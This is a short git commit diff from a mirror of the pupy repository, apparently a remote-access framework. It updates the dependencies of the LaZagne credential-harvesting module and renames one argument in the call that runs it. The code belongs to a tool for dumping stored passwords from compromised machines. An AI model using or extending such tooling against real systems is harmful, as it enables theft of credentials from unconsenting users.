mirror of https://github.com/n1nj4sec/pupy.git
This commit is contained in:
parent
cbb7967724
commit
d22bf22900
|
@ -17,8 +17,8 @@ class LaZagne(PupyModule):
|
||||||
dependencies = {
|
dependencies = {
|
||||||
'all': [
|
'all': [
|
||||||
'whole', 'sqlite3', 'xml', 'calendar',
|
'whole', 'sqlite3', 'xml', 'calendar',
|
||||||
'memorpy', 'ConfigParser', 'Crypto.Util.asn1',
|
'memorpy', 'ConfigParser', 'construct',
|
||||||
'Crypto.PublicKey', 'lazagne', 'laZagne'
|
'lazagne', 'laZagne', 'pyasn1'
|
||||||
],
|
],
|
||||||
'linux': [
|
'linux': [
|
||||||
'secretstorage', 'crypt'
|
'secretstorage', 'crypt'
|
||||||
|
@ -73,7 +73,7 @@ class LaZagne(PupyModule):
|
||||||
|
|
||||||
results = obtain(whole(
|
results = obtain(whole(
|
||||||
runLaZagne,
|
runLaZagne,
|
||||||
category_choosed=args.category, raise_on_exception=False))
|
category_selected=args.category, raise_on_exception=False))
|
||||||
|
|
||||||
for r in results:
|
for r in results:
|
||||||
if r[0] == 'User':
|
if r[0] == 'User':
|
||||||
|
|
Loading…
Reference in New Issue